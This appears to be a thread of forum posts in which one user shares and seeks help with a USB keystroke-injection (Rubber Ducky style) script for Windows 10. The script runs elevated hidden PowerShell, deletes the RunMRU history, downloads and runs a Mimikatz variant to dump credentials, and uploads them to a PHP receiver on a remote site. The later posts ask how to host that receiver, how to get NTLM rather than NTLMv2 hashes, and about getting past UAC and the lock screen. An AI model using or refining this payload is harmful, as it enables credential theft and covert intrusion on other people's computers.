mhuggins

ok i got this working like a champ but quick question..... i keep getting ntlmv2 hash and not ntlm. Is there a way to get the ntlm hash instead of v2?

yes i did try manually. What appears to happen that after the first string completes it opens the UAC dialog box but doesnt work after that. I have to physically click the dialog box then press ALT y myself.....almost like the UAC box isnt the active window if that makes sense. I thought maybe it was the delay that was the problem but i set it to 10000 and still woulldnt work. I am using US keyboard

below is my code that i piece together from other scripts including the Mr. Robot cred dump..... again i take no credit in this but i need help. Win 10 machine with UAC enabled When i run the script it doesnt get pass the UAC yes or no box .... any ideas I have the ALT y command in there during testing so its not bot the ALT y or LEFTARROW Thanks in advance DELAY 1000 GUI r DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 500 REM ALT y LEFTARROW DELAY 300 ENTER DELAY 300 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://www.mysite/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('http://www.mysite/rx.php', $o)" ENTER

Trying to decided between bashbunny or the LAN turtle.... Just want to know of the bunny can do the lock screen bypass that the turtle can do that mubix showcased and Darren talked about

i have it .... just dont want to be wrong. Thanks bud

one last thing .... what format do i save the rx file. just open notepad paste it then save as ....... php?

thanks ill give it a try

ok does it matter where in the file sturcture or just the root of the website directory

Tw1sT you said use your domain.com page to host the cred receiving php script...... how or where do you do that Thanks